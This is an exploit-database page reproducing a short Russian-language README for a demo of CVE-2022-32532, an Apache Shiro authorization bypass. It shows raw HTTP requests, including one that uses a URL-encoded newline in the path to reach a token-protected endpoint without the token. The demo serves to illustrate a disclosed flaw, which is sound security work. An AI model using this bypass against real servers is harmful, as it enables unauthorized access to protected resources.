Sploitus

Exploit for CVE-2022-32532 CVE-2022-22978 CVE-2022-32532

kitploit · 2026-08-25

Exploit Code

MARKDOWN45 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LAY0US-CVE-2022-32532
# CVE-2022-32532

## Описание

Это демонстрационный проект, который показывает лишь одно из условий эксплуатации этой уязвимости (CVE-2022-32532).

На самом деле существует больше способов её эксплуатации: пока разработчики используют `RegExPatternMatcher`, будет оставаться возможная уязвимость обхода.

## Введение

При текущей конфигурации требуется проверка токена в заголовке запроса, иначе у вас нет прав доступа к интерфейсу по пути `/permit`

Этот запрос может быть успешным

root@kitploit:~
    
    
    GET /permit/any HTTP/1.1
    Token: 4ra1n
    

Доступ не разрешается, если в запросе отсутствует заголовок токена

root@kitploit:~
    
    
    GET /permit/any HTTP/1.1
    

Его можно обойти простым способом в особых, но распространённых конфигурациях

root@kitploit:~
    
    
    GET /permit/a%0any HTTP/1.1
    

## Ссылки

https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh

Эта уязвимость похожа на Spring-Security CVE-2022-22978

Благодарность bdemers (участник Apache Shiro PMC) и chybeta (исследователь безопасности)